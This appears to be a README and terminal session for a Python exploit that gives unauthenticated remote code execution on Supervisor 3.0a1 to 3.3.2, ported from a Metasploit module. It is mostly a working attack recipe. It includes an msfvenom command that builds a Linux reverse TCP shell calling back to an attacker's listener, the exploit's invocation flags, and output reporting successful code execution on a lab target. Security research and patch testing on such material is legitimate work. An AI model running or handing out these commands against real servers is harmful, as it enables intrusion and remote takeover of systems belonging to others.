Standalone Python ≥3.6 Unauthenticated RCE exploit for Supervisor 3.0a1 to 3.3.2, rewritten from this Metasploit module. Explanatory post here.
Tested with Python 3.7 on this target runing Supervisor 3.3.2
root@Kali:~/Infosec/RubyStuff/Supervisor-3.3.2# ./exploit.py -h
usage: exploit.py [-h] -rhost RHOST [-rport RPORT] -payload PAYLOAD
[-rpcpath RPCPATH]
Generate the payload first, eg:
msfvenom -a x64 --platform Linux -p linux/x64/shell_reverse_tcp LHOST=192.168.92.134 LPORT=4445 -f elf -o dir/payload.elf
Required arguments:
-rhost RHOST Target host running Supervisor eg. 192.168.92.153
-payload PAYLOAD Path to the ELF payload. eg dir/payload.elf
Optional arguments:
-rport RPORT Target port running Supervisor. Default: 9001
-rpcpath RPCPATH Path to the XML-RPC endpoint on Supervisor. Default: '/RPC2' as in http://192.168.92.153:9001/RPC2
Call the exploit like this:
./exploit.py -rhost 192.168.92.153 -rport 9001 -rpcpath /RPC2 -payload dir/payload.elf
root@Kali:~/Infosec/RubyStuff/Supervisor-3.3.2# msfvenom -a x64 --platform Linux -p linux/x64/shell_reverse_tcp LHOST=192.168.92.134 LPORT=4445 -f elf -o payload.elf
No encoder or badchars specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: payload.elf
root@Kali:~/Infosec/RubyStuff/Supervisor-3.3.2# ./exploit.py -rhost 192.168.92.153 -payload payload.elf
Extracting version from web interface..
Vulnerable version found: 3.3.2
Sending XML-RPC payload via POST to 192.168.92.153:9001/RPC2
Successful remote code execution